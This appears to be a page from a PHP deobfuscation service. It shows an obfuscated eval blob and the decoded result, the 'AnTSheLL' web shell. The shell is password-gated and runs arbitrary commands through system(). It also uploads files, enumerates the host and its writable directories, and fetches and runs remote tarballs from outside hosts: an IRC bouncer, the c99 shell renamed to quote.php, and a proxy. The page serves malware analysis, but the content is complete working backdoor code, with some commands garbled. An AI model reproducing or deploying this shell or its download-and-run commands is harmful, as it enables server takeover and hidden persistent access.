Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<? eval(gzinflate(base64_decode(str_rot13(strrev('o4sKQ/mmrgRq/5WnsQng6rTWYjV2xcf7odzoI3r0..

Decoded Output download

<?php ?><?php
@session_start();
@set_time_limit(0);
//PASSWORD CONFIGURATION
@$pass = $_POST['pass'];
$chk_login = true;
$password = "taruna";
//END CONFIGURATION
if ($pass == $password) {
    $_SESSION['lum'] = "$pass";
}
if ($chk_login == true) {
    if (!isset($_SESSION['lum']) or $_SESSION['lum'] != $password) {
        die("
  <title>Untitled Document</title>

  <center>
  <table border=0 cellpadding=0 cellspacing=0 width=100% height=100%>
  <tr><td valign=middle align=center>
  <table width=100 bgcolor=white border=0 bordercolor=white><tr><td>
  <font size=1 face=verdana><center>
  <b></font></a><br></b>
  </center>

  <form method='post'>
<a href=> </a>
  <input type='password' name='pass' size='20' style='BORDER-RIGHT: #ffffff 1px solid; BORDER-TOP: #ffffff 1px solid; FONT-SIZE: 10px; BORDER-LEFT: #ffffff 1px solid; WIDTH: 110px; BORDER-BOTTOM: #ffffff 1px solid; FONT-FAMILY: Tahoma; outline: none' >
  </form>
  </td></tr></table>
  </td></tr></table>
  ");
    }
}
define('PHPSHELL_VERSION', '9.9');
?>

<title>-x: AnTSheLL :x-</title>
<body text="green" bgcolor="black">
<font face="Verdana" color="red" size="3">
<div align="left">
<p align="center"><b>AnTSheLL</b>
<font face="Verdana" color="yellow" size="2">
<p align="center"><b>cRew-CreW</b>
</p>
<hr>
<div align="left"><b><?php
closelog();
$user = get_current_user();
$login = posix_getuid();
$euid = posix_geteuid();
$ver = phpversion();
$up = `uptime`;
$gid = posix_getgid();
if ($chdir == "") $chdir = getcwd();
if (!$whoami) $whoami = exec("whoami");
?>
<TABLE BORDER="0" CELLPADDING="0" CELLSPACING="0">
<?php
$uname = posix_uname();
while (list($info, $value) = each($uname)) {
?>
<TR>
<TD align="left"><DIV STYLE="font-family: verdana; font-size: 10px;"><b><span style="font-size: 9pt"><?=$info
?>
<span style="font-size: 9pt">:</b> <?=$value ?></span></DIV></TD>
</TR>
<?php
}
?>
<TR>
<TD align="left"><DIV STYLE="font-family: verdana; font-size: 10px;"><b>
<span style="font-size: 9pt">User Info:</b> uid=<?=$login
?>(<?=$whoami
?>) euid=<?=$euid
?>(<?=$whoami
?>) gid=<?=$gid
?>(<?=$whoami
?>)</span></DIV></TD>
</TR>
<TR>
<TD align="left"><DIV STYLE="font-family: verdana; font-size: 10px;"><b>
<span style="font-size: 9pt">Current Path:</b> <?=$chdir ?></span></DIV></TD>
</TR>
<TR>
<TD align="left"><DIV STYLE="font-family: verdana; font-size: 10px;"><b>
<span style="font-size: 9pt">Write Directory:</b> <? if(@is_writable($chdir)){ echo "Yes"; }else{ echo "No"; } ?>
</span></DIV></TD>
</TR>  
<TR>
<TD align="left"><DIV STYLE="font-family: verdana; font-size: 10px;"><b>
<span style="font-size: 9pt">Server Services:</b> <?="$SERVER_SOFTWARE $SERVER_VERSION"; ?>
</span></DIV></TD>
</TR>
<TR>
<TD align="left"><DIV STYLE="font-family: verdana; font-size: 10px;"><b>
<span style="font-size: 9pt">Server Address:</b> <?="$SERVER_ADDR $SERVER_NAME"; ?>
</span></DIV></TD>
</TR>
<TR>
<TD align="left"><DIV STYLE="font-family: verdana; font-size: 10px;"><b>
<span style="font-size: 9pt">Script Current User:</b> <?=$user ?></span></DIV></TD>
</TR>
<TR>
<TD align="left"><DIV STYLE="font-family: verdana; font-size: 10px;"><b>
<span style="font-size: 9pt">UP Time:</b> <?=$up ?></span></DIV></TD>
</TR>
<TR>
<TD align="left"><DIV STYLE="font-family: verdana; font-size: 10px;"><b>
<span style="font-size: 9pt">PHP Version:</b> <?=$ver ?></span></DIV></TD>
</TR>
<TR>
<TD align="left"><DIV STYLE="font-family: verdana; color: green ; font-size: 10px;"><b>
<span style="font-size: 9pt">Wget:</b> <? if(exec("wget --help")){ echo "Yes"; }else{ echo "No"; } ?>
</span></DIV></TD>
</TR> 
</TABLE>
</b></font>
<?php
set_magic_quotes_runtime(0);
$currentWD = str_replace("\","\",$_POST['_cwd']);
$currentCMD = str_replace("\","\",$_POST['_cmd']);

$UName  = `uname -a`;
$SCWD   = `pwd`;
$UserID = `id`;

if( $currentWD == "" ) {
    $currentWD = $SCWD;
}

if( $_POST['_act'] == "[W]Dir" ) {
    $currentCMD = "find . -typed - perm - 2 - ls";
}

if( $_POST['_act'] == "GAEPSY" ) {
    $currentCMD = "mkdir / tmp / . . . .;
cd / tmp / . . . .;
wgethttp: //www.fileden.com/files/2010/4/8/2821971/My Documents/psy.tar.gz;tar -zxvf psy.tar.gz;rm -rf psy.tar.gz;mv .psy ...;cd /tmp/..../...;./config $currentCMD ;./fuck;./run";
    
}
if ($_POST['_act'] == "GAE SHELL") {
    $currentCMD = "wget http://www.fileden.com/files/2010/4/8/2821971/My Documents/c99.txt;mv c99.txt quote.php";
}
if ($_POST['_act'] == "PROXY") {
    $currentCMD = "mkdir /tmp/....;cd /tmp/..../;wget http://www.php.monacoyachtshow.org/zoneperso/images/proxy.tgz;tar -zxvf proxy.tgz;rm -rf proxy.tgz;cd /tmp/.../pro;./prox -d -a -p$currentCMD";
}
if ($_POST['_act'] == "CHECK") {
    $currentCMD = "ps x";
}
if ($_POST['_act'] == "LIST IP") {
    $currentCMD = "/sbin/ifconfig | grep inet";
}
if ($_POST['_act'] == "PORTS") {
    $currentCMD = "netstat -an";
}
if ($_POST['_act'] == "List Files") {
    $currentCMD = "ls -la";
}
if ($_POST['_act'] == "777") {
    $currentCMD = "find / -type d -perm 777";
}
print "<form method=post enctype=\"multipart/form-data\"><hr><table>";
print "<tr><td><b>Execute command:</b></td><td><input size=100 name=\"_cmd\" value=\"" . $currentCMD . "\"></td>";
print "<td><input type=submit name=_act value=\"EXECT\"><input type=submit name=_act value=\"GAE PSY\"><input type=submit name=_act value=\"PROXY\"></td></tr>";
print "<tr><td><b>Change directory:</b></td><td><input size=100 name=\"_cwd\" value=\"" . $currentWD . "\"></td>";
print "<td><input type=submit name=_act value=\"List Files\"><input type=submit name=_act value=\"[W]Dir\"><input type=submit name=_act value=\"GAE SHELL\"></td></tr>";
print "<tr><td><b>Upload file:</b></td><td><input size=85 type=file name=_upl></td>";
print "<td><input type=submit name=_act value=\"Upload!\"></td></tr>";
print "<tr><td><input type=submit name=_act value=\"HELP\"><input type=submit name=_act value=\"CHECK\"><input type=submit name=_act value=\"LIST IP\"><input type=submit name=_act value=\"PORTS\"></td></tr>";
print "<tr><td><input type=submit name=_act value=\"777\"></td></tr>";
print "</table></form><hr>";
$currentCMD = str_replace("\"", "\"", $currentCMD);
$currentCMD = str_replace("\'", "\'", $currentCMD);
if ($_POST['_act'] == "HELP") {
    print "<table>";
    print "<tr><td>Command EXECT = Untuk menjalankan perintah.</td></tr>";
    print "<tr><td>Command PROXY = Masukkan port proxy di kolom EXECT.</td></tr>";
    print "<tr><td>Command GAE PSY = Masukkan port di kolom EXECT.</td></tr>";
    print "<tr><td>Command GAE SHELL = Menginstall Shell .</td></tr>";
    print "<tr><td>Command LIST IP = Untuk mengetahui IP Shell.</td></tr>";
    print "<tr><td>Command LIST = Untuk melihat isi direktori.</td></tr>";
    print "<tr><td>Command [W]Dir = Untuk melihat direktori WRITE.</td></tr>";
    print "<tr><td>Command PORTS = Untuk melihat port yg terbuka.</td></tr>";
    print "<tr><td>Command CHECK = Untuk melihat semua proses.</td></tr>";
    print "<tr><td>Command 777 = Untuk melihat direktory aktif.</td></tr>";
    print "</table></form><hr><hr>";
}
if ($_POST['_act'] == "Upload!") {
    if ($_FILES['_upl']['error'] != UPLOAD_ERR_OK) {
        print "<center><b>JancoX ErroR!</b></center>";
    } else {
        print "<center><pre>";
        system("mv " . $_FILES['_upl']['tmp_name'] . " " . $currentWD . "/" . $_FILES['_upl']['name'] . " 2>&1");
        print "</pre><b>Upload Berhasil CoY!</b></center>";
    }
} else {
    print "

<!-- OUTPUT STARTS HERE -->
<pre>
";
    $currentCMD = "cd " . $currentWD . ";" . $currentCMD;
    system("$currentCMD 1> /tmp/cRewShell 2>&1; cat /tmp/cRewShell; rm -rf /tmp/cRewShell");
    print "
</pre>
<!-- OUTPUT ENDS HERE -->

</center><hr><center><b>DIPAKE-BERSAMA!</b></center>";
}
exit;
?></body></font></font></b></font><?

Did this file decode correctly?

Original Code

<? eval(gzinflate(base64_decode(str_rot13(strrev('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'))))); ?>

Function Calls

base64_decode 1
strrev 1
str_rot13 1
gzinflate 1

Variables

None

Stats

MD5 08eb74ca92fb4a8dbd9f48d3018ee490
Eval Count 1
Decode Time 322 ms